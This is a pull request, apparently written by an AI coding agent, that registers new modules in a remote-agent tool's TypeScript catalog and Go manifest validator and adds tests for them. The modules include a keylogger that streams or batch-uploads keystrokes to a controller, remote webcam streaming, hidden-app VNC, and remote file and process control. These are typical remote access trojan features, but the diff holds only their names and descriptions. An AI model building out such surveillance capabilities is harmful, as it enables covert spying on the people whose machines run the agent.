### PR TITLE
Sync shared module catalog with agent runtime

### DIFF
--- a/shared/modules/index.ts
+++ b/shared/modules/index.ts
@@ -21,6 +21,21 @@ export interface AgentModuleDefinition {
 
 export const agentModules: AgentModuleDefinition[] = [
   {
+    id: "app-vnc",
+    title: "Application VNC",
+    description:
+      "Launches curated applications inside a disposable workspace and streams them through VNC.",
+    commands: ["app-vnc"],
+    capabilities: [
+      {
+        id: "app-vnc.launch",
+        name: "app-vnc.launch",
+        description:
+          "Clone per-application profiles and start virtualized sessions.",
+      },
+    ],
+  },
+  {
     id: "remote-desktop",
     title: "Remote Desktop",
     description:
@@ -68,6 +83,26 @@ export const agentModules: AgentModuleDefinition[] = [
     ],
   },
   {
+    id: "webcam-control",
+    title: "Webcam Control",
+    description: "Enumerate and control remote webcam devices.",
+    commands: ["webcam-control"],
+    capabilities: [
+      {
+        id: "webcam.enumerate",
+        name: "webcam.enumerate",
+        description:
+          "Enumerate connected webcam devices and capabilities.",
+      },
+      {
+        id: "webcam.stream",
+        name: "webcam.stream",
+        description:
+          "Initiate webcam streaming sessions when supported.",
+      },
+    ],
+  },
+  {
     id: "audio-control",
     title: "Audio Control",
     description:
@@ -97,6 +132,27 @@ export const agentModules: AgentModuleDefinition[] = [
     ],
   },
   {
+    id: "keylogger",
+    title: "Keylogger",
+    description:
+      "Capture keystrokes and related telemetry from the remote host.",
+    commands: ["keylogger.start", "keylogger.stop"],
+    capabilities: [
+      {
+        id: "keylogger.stream",
+        name: "keylogger.stream",
+        description:
+          "Stream keystroke telemetry to the controller in near real time.",
+      },
+      {
+        id: "keylogger.batch",
+        name: "keylogger.batch",
+        description:
+          "Batch keystrokes offline and upload on a schedule.",
+      },
+    ],
+  },
+  {
     id: "clipboard",
     title: "Clipboard Manager",
     description:
@@ -113,6 +169,67 @@ export const agentModules: AgentModuleDefinition[] = [
         id: "clipboard.push",
         name: "Clipboard push",
         description: "Push operator clipboard payloads to the remote host.",
+      },
+    ],
+  },
+  {
+    id: "file-manager",
+    title: "File Manager",
+    description: "Inspect and manage the remote file system.",
+    commands: ["file-manager"],
+    capabilities: [
+      {
+        id: "file-manager.explore",
+        name: "file-manager.explore",
+        description:
+          "Enumerate directories and retrieve file contents from the host.",
+      },
+      {
+        id: "file-manager.modify",
+        name: "file-manager.modify",
+        description:
+          "Create, update, move, and delete files and directories on demand.",
+      },
+    ],
+  },
+  {
+    id: "task-manager",
+    title: "Task Manager",
+    description: "Enumerate and control processes on the remote host.",
+    commands: ["task-manager"],
+    capabilities: [
+      {
+        id: "task-manager.list",
+        name: "task-manager.list",
+        description:
+          "Collect real-time process snapshots with metadata.",
+      },
+      {
+        id: "task-manager.control",
+        name: "task-manager.control",
+        description:
+          "Start and orchestrate process actions on demand.",
+      },
+    ],
+  },
+  {
+    id: "tcp-connections",
+    title: "TCP Connections",
+    description:
+      "Enumerate and govern active TCP sockets exposed by the host.",
+    commands: ["tcp-connections"],
+    capabilities: [
+      {
+        id: "tcp-connections.enumerate",
+        name: "tcp-connections.enumerate",
+        description:
+          "Collect real-time socket state with process attribution.",
+      },
+      {
+        id: "tcp-connections.control",
+        name: "tcp-connections.control",
+        description:
+          "Stage enforcement actions for suspicious remote peers.",
       },
     ],
   },

--- a/shared/pluginmanifest/manifest.go
+++ b/shared/pluginmanifest/manifest.go
@@ -135,15 +135,27 @@ var (
 	knownRuntimeTypes   = []RuntimeType{RuntimeNative, RuntimeWASM}
 	semverPattern       = regexp.MustCompile(`^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-[0-9A-Za-z-.]+)?(?:\+[0-9A-Za-z-.]+)?$`)
 	registeredModules   = map[string]struct{}{
-		"remote-desktop": {},
-		"audio-control":  {},
-		"clipboard":      {},
-		"recovery":       {},
-		"client-chat":    {},
-		"system-info":    {},
-		"notes":          {},
+		"app-vnc":         {},
+		"remote-desktop":  {},
+		"webcam-control":  {},
+		"audio-control":   {},
+		"keylogger":       {},
+		"clipboard":       {},
+		"file-manager":    {},
+		"task-manager":    {},
+		"tcp-connections": {},
+		"recovery":        {},
+		"client-chat":     {},
+		"system-info":     {},
+		"notes":           {},
 	}
 	registeredCapabilities = map[string]CapabilityMetadata{
+		"app-vnc.launch": {
+			ID:          "app-vnc.launch",
+			Module:      "app-vnc",
+			Name:        "app-vnc.launch",
+			Description: "Clone per-application profiles and start virtualized sessions.",
+		},
 		"remote-desktop.stream": {
 			ID:          "remote-desktop.stream",
 			Module:      "remote-desktop",
@@ -174,6 +186,18 @@ var (
 			Name:        "Performance telemetry",
 			Description: "Collect frame quality and adaptive bitrate metrics for dashboards.",
 		},
+		"webcam.enumerate": {
+			ID:          "webcam.enumerate",
+			Module:      "webcam-control",
+			Name:        "webcam.enumerate",
+			Description: "Enumerate connected webcam devices and capabilities.",
+		},
+		"webcam.stream": {
+			ID:          "webcam.stream",
+			Module:      "webcam-control",
+			Name:        "webcam.stream",
+			Description: "Initiate webcam streaming sessions when supported.",
+		},
 		"audio.capture": {
 			ID:          "audio.capture",
 			Module:      "audio-control",
@@ -186,6 +210,18 @@ var (
 			Name:        "Audio injection",
 			Description: "Inject operator-provided audio streams into the remote session.",
 		},
+		"keylogger.stream": {
+			ID:          "keylogger.stream",
+			Module:      "keylogger",
+			Name:        "keylogger.stream",
+			Description: "Stream keystroke telemetry to the controller in near real time.",
+		},
+		"keylogger.batch": {
+			ID:          "keylogger.batch",
+			Module:      "keylogger",
+			Name:        "keylogger.batch",
+			Description: "Batch keystrokes offline and upload on a schedule.",
+		},
 		"clipboard.capture": {
 			ID:          "clipboard.capture",
 			Module:      "clipboard",
@@ -197,6 +233,42 @@ var (
 			Module:      "clipboard",
 			Name:        "Clipboard push",
 			Description: "Push operator clipboard payloads to the remote host.",
+		},
+		"file-manager.explore": {
+			ID:          "file-manager.explore",
+			Module:      "file-manager",
+			Name:        "file-manager.explore",
+			Description: "Enumerate directories and retrieve file contents from the host.",
+		},
+		"file-manager.modify": {
+			ID:          "file-manager.modify",
+			Module:      "file-manager",
+			Name:        "file-manager.modify",
+			Description: "Create, update, move, and delete files and directories on demand.",
+		},
+		"task-manager.list": {
+			ID:          "task-manager.list",
+			Module:      "task-manager",
+			Name:        "task-manager.list",
+			Description: "Collect real-time process snapshots with metadata.",
+		},
+		"task-manager.control": {
+			ID:          "task-manager.control",
+			Module:      "task-manager",
+			Name:        "task-manager.control",
+			Description: "Start and orchestrate process actions on demand.",
+		},
+		"tcp-connections.enumerate": {
+			ID:          "tcp-connections.enumerate",
+			Module:      "tcp-connections",
+			Name:        "tcp-connections.enumerate",
+			Description: "Collect real-time socket state with process attribution.",
+		},
+		"tcp-connections.control": {
+			ID:          "tcp-connections.control",
+			Module:      "tcp-connections",
+			Name:        "tcp-connections.control",
+			Description: "Stage enforcement actions for suspicious remote peers.",
 		},
 		"recovery.queue": {
 			ID:          "recovery.queue",

--- a/shared/pluginmanifest/manifest_test.go
+++ b/shared/pluginmanifest/manifest_test.go
@@ -108,3 +108,32 @@ func TestManifestValidateDependencies(t *testing.T) {
 		t.Fatal("expected self dependency validation failure")
 	}
 }
+
+func TestManifestValidateRecognizesRegisteredModulesAndCapabilities(t *testing.T) {
+	for moduleID := range registeredModules {
+		manifest := buildTestManifest()
+		manifest.Requirements.RequiredModules = []string{moduleID}
+
+		if err := manifest.Validate(); err != nil {
+			t.Fatalf("expected module %s to be registered, got %v", moduleID, err)
+		}
+	}
+
+	for capabilityID := range registeredCapabilities {
+		manifest := buildTestManifest()
+		manifest.Capabilities = []string{capabilityID}
+
+		if err := manifest.Validate(); err != nil {
+			t.Fatalf("expected capability %s to be registered, got %v", capabilityID, err)
+		}
+	}
+
+	for telemetryID := range registeredTelemetry {
+		manifest := buildTestManifest()
+		manifest.Telemetry = []string{telemetryID}
+
+		if err := manifest.Validate(); err != nil {
+			t.Fatalf("expected telemetry %s to be registered, got %v", telemetryID, err)
+		}
+	}
+}

--- a/shared/types/plugin-manifest.test.ts
+++ b/shared/types/plugin-manifest.test.ts
@@ -1,5 +1,10 @@
 import { describe, expect, it } from "vitest";
 import {
+  agentModuleCapabilityIds,
+  agentModuleIds,
+  agentModuleTelemetryIds,
+} from "../modules/index.js";
+import {
   type PluginManifest,
   validatePluginManifest,
 } from "./plugin-manifest.js";
@@ -106,5 +111,37 @@ describe("validatePluginManifest", () => {
     expect(problems).toContain(
       "dependency test-plugin cannot reference the plugin itself",
     );
+  });
+
+  it("accepts registered module, capability, and telemetry identifiers", () => {
+    for (const moduleId of agentModuleIds) {
+      const manifest = cloneManifest();
+      manifest.requirements.requiredModules = [moduleId];
+
+      const problems = validatePluginManifest(manifest);
+      expect(problems).not.toContain(
+        `required module ${moduleId} is not registered`,
+      );
+    }
+
+    for (const capabilityId of agentModuleCapabilityIds) {
+      const manifest = cloneManifest();
+      manifest.capabilities = [capabilityId];
+
+      const problems = validatePluginManifest(manifest);
+      expect(problems).not.toContain(
+        `capability ${capabilityId} is not registered`,
+      );
+    }
+
+    for (const telemetryId of agentModuleTelemetryIds) {
+      const manifest = cloneManifest();
+      manifest.telemetry = [telemetryId];
+
+      const problems = validatePluginManifest(manifest);
+      expect(problems).not.toContain(
+        `telemetry ${telemetryId} is not registered`,
+      );
+    }
   });
 });


### PR DESCRIPTION
## Summary
- add Application VNC, Webcam Control, Keylogger, File Manager, Task Manager, and TCP Connections modules to the shared TypeScript catalogue
- register the new module IDs and their capabilities in the Go manifest validator
- extend Go and TypeScript manifest validation tests to cover the full module and capability set

## Testing
- go test github.com/rootbay/tenvy-client/shared/pluginmanifest
- npx vitest run types/plugin-manifest.test.ts


------
https://chatgpt.com/codex/tasks/task_e_68fd3d18ee84832ba6a6a8c2fa83b39a